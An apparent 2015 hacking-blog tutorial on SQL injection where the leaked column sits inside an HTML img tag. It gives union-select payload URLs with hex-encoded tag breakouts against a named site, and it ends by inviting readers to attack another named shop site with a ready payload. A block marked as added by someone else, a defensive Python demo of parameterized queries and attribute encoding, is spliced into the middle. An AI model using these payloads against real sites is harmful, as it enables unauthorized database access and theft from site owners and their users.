Sunday, 10 May 2015

[SQLI TRICK] Injection Into HTML Tag [TUT]

This tutorial shows how to inject when the injected value lands inside an HTML tag.
Let's start.
Suppose we have this site:

Code:
www.marsfigures.com/main.php?id=-2 union select 1,2,3--
(Ignore the errors above.)
We can't see the vulnerable column on the screen,
so we replace the column values like this:

Code:
www.marsfigures.com/main.php?id=-2 union select 1111,2222,3333--
I did this because I want to search for them in the source code.
Right click > View source.
Now that we are in the source, let's find them:
Ctrl+F, then search for '1111', '2222' or '3333'.


We can see that column 2222 is inside an HTML tag.
Let's inject in column 2.
Column 2 is inside an <img src="injection"> tag,
so we close the tag and then inject normally, like this:

Code:
http://www.marsfigures.com/main.php?id=-2 union select 1111,concat(0x223e,@@version),3333--
0x = hex prefix.
223e = ">
So the final result is:
<img src="">injection


Now we can see our injection on the screen, but we want it to be clean,
so we open the tag again, like this:

Code:
http://www.marsfigures.com/main.php?id=-2 union select 1111,concat(0x223e,@@version,0x3c696d67207372633d22),3333--
3c696d67207372633d22 = <img src="
Final result:
<img src="">injection<img src="...


It doesn't always have to be ">. It can be </title> or </script> or anything else; always check the source code.
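
Seen from the defending side, the `<img src>` breakout above works only when the application builds the query by string concatenation and writes the column into the attribute unencoded. The following is an added example, not code from the original post or from the site: it uses Python with an in-memory SQLite table as a stand-in for the PHP/MySQL page (the table, the function names and the MARKER value are assumptions) and shows the vulnerable path beside a bound parameter and attribute encoding.

```python
import html
import re
import sqlite3

def make_db():
    # Constructed sample table; stands in for the page's MySQL backend.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE figures (id INTEGER PRIMARY KEY, img TEXT, title TEXT)")
    db.execute("INSERT INTO figures VALUES (1, 'mars.png', 'Mars')")
    return db

def fetch_vulnerable(db, raw_id):
    # id is concatenated into the SQL text, so the database parses it as SQL.
    sql = "SELECT id, img, title FROM figures WHERE id = " + raw_id
    return db.execute(sql).fetchall()

def fetch_parameterized(db, raw_id):
    # Reject anything that is not an integer, then bind it as a value.
    if not re.fullmatch(r"-?[0-9]+", raw_id):
        return []
    sql = "SELECT id, img, title FROM figures WHERE id = ?"
    return db.execute(sql, (int(raw_id),)).fetchall()

def render(row):
    # Vulnerable template: column 2 goes into the src attribute unencoded.
    return '<img src="%s">' % row[1]

def render_encoded(row):
    # Hardened template: a quote in the data can no longer end the attribute.
    return '<img src="%s">' % html.escape(str(row[1]), quote=True)

# Constructed request value modelled on the page's column-2 breakout, using
# SQLite's || operator and a fixed MARKER instead of concat() and @@version.
HOSTILE_ID = "-2 UNION SELECT 1111, '\">' || 'MARKER', 3333"

if __name__ == "__main__":
    db = make_db()
    row = fetch_vulnerable(db, HOSTILE_ID)[0]
    print(render(row))          # attribute closed early, MARKER lands in page text
    print(render_encoded(row))  # MARKER stays inside the attribute value
    print(fetch_parameterized(db, HOSTILE_ID))  # no rows: input never reaches SQL
```

Attribute encoding covers the `<img src="...">` case only; values written inside `<title>` or `<script>` need the encoding that matches that context, and the bound parameter is what removes the injection itself.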

Hope you learned something.


http://www.audiotrends.com.au/Favourite.html?action=viewProduct&itemId=1192*0 union (select 1,2,3,4,5,6)--+

Try it yourself... It will be solved as I, Benzi, solved it...

Author ::: BENZi





